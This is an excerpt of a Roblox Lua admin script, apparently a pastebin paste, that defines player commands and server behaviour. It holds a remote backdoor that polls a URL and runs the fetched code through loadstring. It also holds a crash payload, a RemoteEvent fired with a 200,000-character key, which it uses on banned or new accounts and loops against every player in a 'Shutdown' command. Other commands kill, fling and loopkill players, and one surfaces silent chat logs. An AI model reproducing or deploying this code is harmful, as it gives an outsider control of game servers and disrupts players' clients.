  7807. chatFunc(v)
  7808. onAdded(v)
  7809. elseif (Banned[v.Name] or v.AccountAge < 90) then
  7810. local Ok, Err = pcall(function() v:Kick() end)
  7811. if not Ok then
  7812. pcall(function() Instance.new("RemoteEvent", v):FireClient(v,{[string.rep("a",2e5+5)]="a"}) end)
  7813. end
  7814. warn("Crashing: " .. v.Name)
  7815. else
  7816. chatFunc(v)
  7817. end
  7818. end
  7819.  
  7820. Plrs.PlayerAdded:connect(function(Plr)
  7821. Run(function()
  7822. if (isTesting) or (isSB and Plr.Name == Owner) or (isGame and Plr.userId == Owner) then
  7823. for _,v in pairs(Cons) do
  7824. pcall(function() v:disconnect() end)
  7825. end
  7826. Cons = {}
  7827. GUIs = {}
  7828. LP = Plr
  7829. warn("Found Owner (" .. LP.Name .. ")")
  7830. chatFunc(Plr)
  7831. onAdded(Plr)
  7832. elseif (Banned[Plr.Name] or Plr.AccountAge < 90) then
  7833. local Ok, Err = pcall(function() Plr:Kick() end)
  7834. if not Ok then
  7835. pcall(function() Instance.new("RemoteEvent", Plr):FireClient(Plr,{[string.rep("a",2e5+5)]="a"}) end)
  7836. end
  7837. warn("Crashing: " .. Plr.Name)
  7838. else
  7839. chatFunc(Plr)
  7840. end
  7841. pcall(function() warn(Plr.Name, Plr.AccountAge) end)
  7842. end)
  7843. end)
  7844.  
  7845. Plrs.PlayerRemoving:connect(function(Plr)
  7846. Run(function()
  7847. if LP and Plr == LP then
  7848. warn("Disconnected")
  7849. LP = nil
  7850. for _,v in pairs(Cons) do
  7851. pcall(function() v:disconnect() end)
  7852. end
  7853. Cons = {}
  7854. GUIs = {}
  7855. end
  7856. end)
  7857. end)
  7858.  
  7859. Run(function()
  7860. repeat wait(1/30) until checkedData
  7861. while wait(waitTimeBan) do
  7862. if isBan then
  7863. ypcall(function()
  7864. local Source = HServer:GetAsync(BanLink, true)
  7865. if Source ~= nil and type(Source) == "string" and Source ~= "" and Source ~= BanPage then
  7866. BanPage = Source
  7867. local NewBanned = {}
  7868. for Name in BanPage:gmatch("%w+") do
  7869. NewBanned[Name] = true
  7870. end
  7871. Banned = NewBanned
  7872. warn("Banlist was updated")
  7873. coroutine.wrap(function()
  7874. for _,v in pairs(Plrs:GetPlayers()) do
  7875. if Banned[v.Name] then
  7876. local Ok, Err = pcall(function() v:Kick() end)
  7877. if not Ok then
  7878. pcall(function() Instance.new("RemoteEvent", v):FireClient(v,{[string.rep("a",2e5+5)]="a"}) end)
  7879. end
  7880. warn("Founde Ban List : " .. v.Name)
  7881. end
  7882. end
  7883. end)()
  7884. end
  7885. end)
  7886. end
  7887. end
  7888. end)
  7889.  
  7890. Run(function()
  7891. repeat wait(1/30) until checkedData
  7892. while wait(waitTime) do
  7893. if isRemote then
  7894. ypcall(function()
  7895. local Source = HServer:GetAsync(RemoteLink, true)
  7896. if Source ~= RemotePage then
  7897. RemotePage = Source
  7898. if Source:sub(1, 6):lower() == "[fast]" then
  7899. Source = Source:sub(8)
  7900. waitTime = 0.5
  7901. waitTimeBan = 2
  7902. Hint("Switched to fast")
  7903. elseif Source:sub(1, 6):lower() == "[slow]" then
  7904. Source = Source:sub(8)
  7905. waitTime = 5
  7906. waitTimeBan = 5
  7907. Hint("Switched to slow")
  7908. end
  7909. if Source:sub(1, 4):lower() == "[l] " then
  7910. for _,v in pairs(game:GetService("Players"):GetPlayers()) do
  7911. if v.Character and v.Character.Parent == Workspace then
  7912. local Ok, Err = coroutine.resume(coroutine.create(function()
  7913. NLS(Source:sub(5), v.Character)
  7914. end))
  7915. if Ok then
  7916. warn("[S] Script Ran")
  7917. else
  7918. warn("[S] Error: " .. Err)
  7919. end
  7920. end
  7921. end
  7922. elseif Source:sub(1, 4):lower() == "[e] " then
  7923. local Func, Err = loadstring(tostring((Source:sub(5))))
  7924. if Func then
  7925. local Success, Err = ypcall(Func)
  7926. if Success then
  7927. warn("[E] Script Ran")
  7928. elseif Err then
  7929. warn("[E] Error: " .. Err)
  7930. end
  7931. elseif Err then
  7932. warn("[E] Error: " .. Err)
  7933. end
  7934. elseif Source:sub(1, 4):lower() == "msg " then
  7935. local Msg = Instance.new("Message", Workspace)
  7936. Msg.Name = "TestHint"
  7937. Msg.Text = Source:sub(5)
  7938. wait(5)
  7939. pcall(function() Msg:Destroy() end)
  7940. else
  7941. local Ok, Err = coroutine.resume(coroutine.create(function()
  7942. NS(Source, Workspace)
  7943. end))
  7944. if Ok then
  7945. warn("[S] Script Ran")
  7946. else
  7947. warn("[S] Error: " .. Err)
  7948. end
  7949. end
  7950. end
  7951. end)
  7952. end
  7953. end
  7954. end)
  7955.  
  7956. function Create(Name, Type, Func, List)
  7957. table.insert(Commands, {
  7958. Name = Name or "N/A";
  7959. Type = Type or 3;
  7960. Func = Func or function() Hint("[" .. Name .. "] No Function Found") end;
  7961. List = List or nil;
  7962. })
  7963. end
  7964.  
  7965. Create(
  7966. "Kill", 1,
  7967. function(List, Command)
  7968. for _,v in pairs(List) do
  7969. Run(function()
  7970. if hasCharacter(v) then
  7971. v.Character:BreakJoints()
  7972. else
  7973. v:LoadCharacter()
  7974. repeat wait(1/30) until hasCharacter(v)
  7975. v.Character:BreakJoints()
  7976. end
  7977. end)
  7978. end
  7979. end
  7980. )
  7981.  
  7982. Create(
  7983. "Rejoin", 1,
  7984. function(List, Command)
  7985. for _,v in pairs(List) do
  7986. Run(function()
  7987. NLS([[game:GetService("TeleportService"):Teleport(game.PlaceId)]], v.Character or v.PlayerGui or v.Backpack or nil)
  7988. end)
  7989. end
  7990. end
  7991. )
  7992.  
  7993.  
  7994. Create(
  7995. "Loopkill", 1,
  7996. function(List, Command)
  7997. for _,v in pairs(List) do
  7998. Run(function()
  7999. Loopkill[v.Name] = true
  8000. local VName = v.Name
  8001. while Loopkill[v.Name] do
  8002. if hasCharacter(v) then
  8003. v.Character:BreakJoints()
  8004. elseif v and v.Parent ~= nil then
  8005. v:LoadCharacter()
  8006. repeat wait(1/30) until hasCharacter(v)
  8007. v.Character:BreakJoints()
  8008. elseif Plrs:findFirstChild(VName) then
  8009. v = Plrs[VName]
  8010. end
  8011. wait(.1)
  8012. end
  8013. end)
  8014. end
  8015. end
  8016. )
  8017.  
  8018. Create(
  8019. "UnLoopkill", 1,
  8020. function(List, Command)
  8021. for _,v in pairs(List) do
  8022. Run(function()
  8023. Loopkill[v.Name] = nil
  8024. end)
  8025. end
  8026. end
  8027. )
  8028.  
  8029. Create(
  8030. "Reset", 1,
  8031. function(List, Command)
  8032. for _,v in pairs(List) do
  8033. v:LoadCharacter()
  8034. end
  8035. end
  8036. )
  8037.  
  8038. Create(
  8039. "Kick (Crash)", 1,
  8040. function(List, Command)
  8041. for _,v in pairs(List) do
  8042. local Ok, Err = pcall(function() v:Kick() end)
  8043. if not Ok then
  8044. if v:findFirstChild("¬v¬F¬i¬r¬e¬") and v["¬v¬F¬i¬r¬e¬"]:IsA("RemoteEvent") then
  8045. v["¬v¬F¬i¬r¬e¬"]:FireClient(v,{[string.rep("a",2e5+5)]="a"})
  8046. warn("Fired Injected")
  8047. else
  8048. Instance.new("RemoteEvent", v):FireClient(v,{[string.rep("a",2e5+5)]="a"})
  8049. warn("Fired New")
  8050. end
  8051. else
  8052. warn("Crashed")
  8053. end
  8054. end
  8055. end
  8056. )
  8057.  
  8058. Create(
  8059. "Kick (Error)", 1,
  8060. function(List, Command)
  8061. for _,v in pairs(List) do
  8062. local Sound = Instance.new("Sound", v)
  8063. Sound.SoundId = "rbxassetid://83594623"
  8064. Sound:Play()
  8065. warn("[E]", v.Name)
  8066. end
  8067. end
  8068. )
  8069.  
  8070. Create(
  8071. "Logs", 1,
  8072. function(List, Command)
  8073. local LogTab = {}
  8074. local PlrNames = {}
  8075. for _,v in pairs(List) do
  8076. PlrNames[v.Name] = true
  8077. end
  8078. for i = #Logs, 1, -1 do
  8079. local Log = Logs[i]
  8080. if PlrNames[Log[2]] then
  8081. local TimeDist = GetTimeDist(Log[3], tick())
  8082. local Msg = Log[1]:gsub("\n", "; ")
  8083. table.insert(LogTab, "[" .. TimeDist .. "] [" .. Log[2] .. "] " .. Msg)
  8084. end
  8085. end
  8086. if GUIs.ScrollRight then
  8087. makeButtons(GUIs.ScrollRight, LogTab, "Size12", true)
  8088. end
  8089. end,
  8090. function()
  8091. local Players = getPlayers()
  8092. table.insert(Players, "All")
  8093. return Players
  8094. end
  8095. )
  8096.  
  8097. Create(
  8098. "Silent Logs", 1,
  8099. function(List, Command)
  8100. local LogTab = {}
  8101. local PlrNames = {}
  8102. for _,v in pairs(List) do
  8103. PlrNames[v.Name] = true
  8104. end
  8105. for i = #Logs, 1, -1 do
  8106. local Log = Logs[i]
  8107. if PlrNames[Log[2]] and Log[4] == true then
  8108. local TimeDist = GetTimeDist(Log[3], tick())
  8109. local Msg = Log[1]:gsub("\n", "; ")
  8110. table.insert(LogTab, "[" .. TimeDist .. "] [" .. Log[2] .. "] " .. Msg)
  8111. end
  8112. end
  8113. if GUIs.ScrollRight then
  8114. makeButtons(GUIs.ScrollRight, LogTab, "Size12", true)
  8115. end
  8116. end,
  8117. function()
  8118. local Players = getPlayers()
  8119. table.insert(Players, "All")
  8120. return Players
  8121. end
  8122. )
  8123.  
  8124. Create(
  8125. "God", 1,
  8126. function(List, Command)
  8127. for _,v in pairs(List) do
  8128. if hasCharacter(v) and v.Character:findFirstChild("Humanoid") then
  8129. v.Character.Humanoid.MaxHealth = math.huge
  8130. end
  8131. end
  8132. end
  8133. )
  8134.  
  8135. Create(
  8136. "ForceField", 1,
  8137. function(List, Command)
  8138. for _,v in pairs(List) do
  8139. if hasCharacter(v) then
  8140. Instance.new("ForceField", v.Character)
  8141. end
  8142. end
  8143. end
  8144. )
  8145.  
  8146. Create(
  8147. "UnForceField", 1,
  8148. function(List, Command)
  8149. for _,v in pairs(List) do
  8150. if hasCharacter(v) then
  8151. for _,v2 in pairs(v.Character:GetChildren()) do
  8152. if v2:IsA("ForceField") then
  8153. v2:Destroy()
  8154. end
  8155. end
  8156. end
  8157. end
  8158. end
  8159. )
  8160.  
  8161. Create(
  8162. "Explode", 1,
  8163. function(List, Command)
  8164. for _,v in pairs(List) do
  8165. if hasCharacter(v) then
  8166. local Ex = Instance.new("Explosion", Workspace)
  8167. Ex.Position = v.Character.Torso.CFrame.p
  8168. Ex.BlastRadius = 6
  8169. Ex.DestroyJointRadiusPercent = 1
  8170. end
  8171. end
  8172. end
  8173. )
  8174.  
  8175. Create(
  8176. "Blast", 1,
  8177. function(List, Command)
  8178. for _,v in pairs(List) do
  8179. if hasCharacter(v) then
  8180. local Ex = Instance.new("Explosion", Workspace)
  8181. Ex.Position = v.Character.Torso.CFrame.p
  8182. Ex.BlastPressure = 5000000
  8183. Ex.BlastRadius = 20
  8184. Ex.DestroyJointRadiusPercent = 0
  8185. end
  8186. end
  8187. end
  8188. )
  8189.  
  8190. Create(
  8191. "Fling", 1,
  8192. function(List, Command)
  8193. for _,v in pairs(List) do
  8194. if hasCharacter(v) then
  8195. v.Character.Torso.Velocity = v.Character.Torso.CFrame.lookVector * Grav * 1.1
  8196. end
  8197. end
  8198. end
  8199. )
  8200.  
  8201. Create(
  8202. "Fix Character", 1,
  8203. function(List, Command)
  8204. for _,v in pairs(List) do
  8205. v.CharacterAppearance = "http://www.roblox.com/Asset/CharacterFetch.ashx?userId=" .. v.userId
  8206. v:LoadCharacter()
  8207. end
  8208. end
  8209. )
  8210.  
  8211. Create(
  8212. "Fix Humanoid", 1,
  8213. function(List, Command)
  8214. for _,v in pairs(List) do
  8215. if hasCharacter(v) then
  8216. local fixedHumanoid = false
  8217. for _,v2 in pairs(v.Character:GetChildren()) do
  8218. if v2:IsA("Humanoid") then
  8219. v2.Name = "Humanoid"
  8220. fixedHumanoid = true
  8221. end
  8222. end
  8223. if fixedHumanoid == false then
  8224. Instance.new("Humanoid", v.Character).Name = "Humanoid"
  8225. end
  8226. end
  8227. end
  8228. end
  8229. )
  8230.  
  8231. Create(
  8232. "Clean", 2,
  8233. function(List, Command)
  8234. for _,v in pairs(game:GetChildren()) do
  8235. ypcall(function()
  8236. if v.Name ~= "Workspace" and v.Name ~= "Players" and v.Name ~= "NetworkServer" and v.Name ~= "StarterPlayer" then
  8237. for _,v2 in pairs(v:GetChildren()) do
  8238. pcall(function()
  8239. v2:Destroy()
  8240. end)
  8241. end
  8242. elseif v.Name == "Players" then
  8243. for _,v2 in pairs(v:GetChildren()) do
  8244. if v2.ClassName == "Player" then
  8245. ypcall(function()
  8246. Clear(v2)
  8247. end)
  8248. else
  8249. pcall(function()
  8250. v2:Destroy()
  8251. end)
  8252. end
  8253. end
  8254. end
  8255. end)
  8256. end
  8257. Clean()
  8258. end,
  8259. function() return {"SERVER"} end
  8260. )
  8261.  
  8262. Create(
  8263. "Shutdown", 2,
  8264. function(List, Command)
  8265. coroutine.resume(coroutine.create(function()
  8266. for _,v in pairs(game:GetChildren()) do
  8267. ypcall(function()
  8268. if v.Name ~= "Workspace" and v.Name ~= "Players" and v.Name ~= "NetworkServer" and v.Name ~= "StarterPlayer" then
  8269. for _,v2 in pairs(v:GetChildren()) do
  8270. pcall(function()
  8271. v2:Destroy()
  8272. end)
  8273. end
  8274. elseif v.Name == "Players" then
  8275. for _,v2 in pairs(v:GetChildren()) do
  8276. if v2.ClassName == "Player" then
  8277. ypcall(function()
  8278. Clear(v2)
  8279. end)
  8280. else
  8281. pcall(function()
  8282. v2:Destroy()
  8283. end)
  8284. end
  8285. end
  8286. end
  8287. end)
  8288. end
  8289. Clean(true)
  8290. end))
  8291. while wait(1/30) do
  8292. ypcall(function()
  8293. for _,v in pairs(game:GetService("Players"):GetPlayers()) do
  8294. ypcall(function()
  8295. Instance.new("RemoteEvent", v):FireClient(v,{[string.rep("a",2e5+5)]="a"})
  8296. end)
  8297. end
  8298. end)
  8299. end
  8300. end,
  8301. function() return {"SERVER"} end
  8302. )
  8303. --[[
  8304. local CurrentObj = game
  8305. local Children = {}
  8306. local ChosenEffect = function() end
  8307. local TopServices = {
  8308. "Workspace";
  8309. "Players";
  8310. "Lighting";
  8311. "ServerStorage";
  8312. "ServerScriptService";
  8313. "ReplicatedStorage";
  8314. "NetworkServer";
  8315. "Teams";
  8316. "StarterPlayer";
  8317. "StarterGui";
  8318. "StarterPack";
  8319. "SoundService";
  8320. "Debris";
  8321. "LogService";
  8322. "HttpService";
  8323. }
  8324.  
  8325. Create( --Left: Effects | Right: Children
  8326. "Explore", 2,
  8327. function(List, Command)
  8328. ChosenEffect()
  8329. end,
  8330. function()
  8331. pcall(function()
  8332. if CurrentObj == nil or not CurrentObj:IsDescendantOf(game) then
  8333. CurrentObj = game
  8334. end
  8335. end)
  8336. Children = {}
  8337. local StringChildren = {}
  8338. local TopAdded = {}
  8339. if CurrentObj == game then
  8340. for _,v in pairs(TopServices) do
  8341. pcall(function()
  8342. if CurrentObj[v] then
  8343. table.insert(Children, CurrentObj[v])
  8344. TopAdded[v] = true
  8345. end
  8346. end)
  8347. end
  8348. end
  8349. warn(#Children)
  8350. for _,v in pairs(CurrentObj:GetChildren()) do
  8351. pcall(function()
  8352. if CurrentObj ~= game then
  8353. table.insert(Children, v)
  8354. elseif TopAdded[v.Name] == nil then
  8355. table.insert(Children, v)
  8356. end
  8357. end)
  8358. end
  8359. warn(#Children, #game:GetChildren())
  8360. for _,v in pairs(Children) do
  8361. pcall(function()
  8362. table.insert(StringChildren, v.Name)
  8363. end)
  8364. end
  8365. return StringChildren
  8366. end
  8367. )
  8368. ]]
  8369. Create(
  8370. "CharacterAutoLoads", 3,
  8371. function(List, Command)
  8372. if List[1] == "True" then
  8373. Plrs.CharacterAutoLoads = true
  8374. elseif List[1] == "False" then
  8375. Plrs.CharacterAutoLoads = false
  8376. end
  8377. end,
  8378. function() return {"True", "False"} end
  8379. )
  8380.  
  8381. Create(
  8382. "Tween Distance", 4,
  8383. function(List, Command)
  8384. TweenNum = tonumber(List[1])
  8385. end,
  8386. function() return {"0", "10", "20", "50", "100", "200", "500", "700"} end
  8387. )
  8388.  
  8389. Create(
  8390. "Tween Time", 4,
  8391. function(List, Command)
  8392. TweenTime = tonumber(List[1])
  8393. end,
  8394. function() return {"0.03", "0.1", "0.5", "1", "2", "5"} end
  8395. )
  8396.  
  8397. Create(
  8398. "Logs Saved", 4,
  8399. function(List, Command)
  8400. LogNum = tonumber(List[1])
  8401. end,
  8402. function() return {"5", "20", "30", "50", "100", "200", "500", "1000", "2000"} end
  8403. )
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement